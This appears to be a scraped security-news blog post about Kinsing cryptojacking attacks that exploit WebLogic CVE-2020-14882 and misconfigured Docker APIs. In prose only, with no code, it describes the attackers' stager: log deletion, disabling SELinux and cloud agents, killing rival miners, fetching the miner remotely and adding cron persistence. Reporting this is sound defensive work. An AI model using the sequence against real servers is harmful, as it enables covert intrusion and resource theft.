Cryptojackers haunted by vulnerable WebLogic and Docker API servers

Trend Micro and Aqua Security experts have recorded new attacks on Linux servers with the aim of secretly mining cryptocurrency. Kinsing bot drivers are looking for unpatched Oracle WebLogic Server software, and someone who looks like the vanished TeamTNT is looking for errors in the Docker daemon settings.

During attacks on WebLogic, Kinsing botnet operators scan for vulnerabilities, both recent and older. Of the latter, attackers most frequently look for the two-year-old RCE CVE-2020-14882 .

If the exploit is successfully processed, a shell script is installed on the server, which works as an intermediate loader. This stager first prepares the ground for cryptojacking: it raises the resource consumption limit (using the ulimit command), deletes the /var/log/syslog log, disables protections like SELinux and Alibaba and Tencent cloud service agents, kills third-party miner processes.

After all these uninvited actions, the Kinsing malware is loaded onto the machine (from a remote server). To make sure it is always present, the shell script creates a new cron job.

Cryptojackers haunted by vulnerable WebLogic and Docker API servers

<img data-lazy-fallback="1" data-attachment-id="6925" data-permalink="" data-orig-file="" data-orig-size="1497,1036" data-comments-opened="1" data-image-title="2" data-image-description="" data-image-caption="" data-medium-file="×208.png" data-large-file="×709.png" class="alignnone size-full wp-image-6925" src="" alt="Cryptojackers haunted by vulnerable WebLogic and Docker API servers" width="1497" height="1036"

Read more

Explore the site

More from the blog

Latest News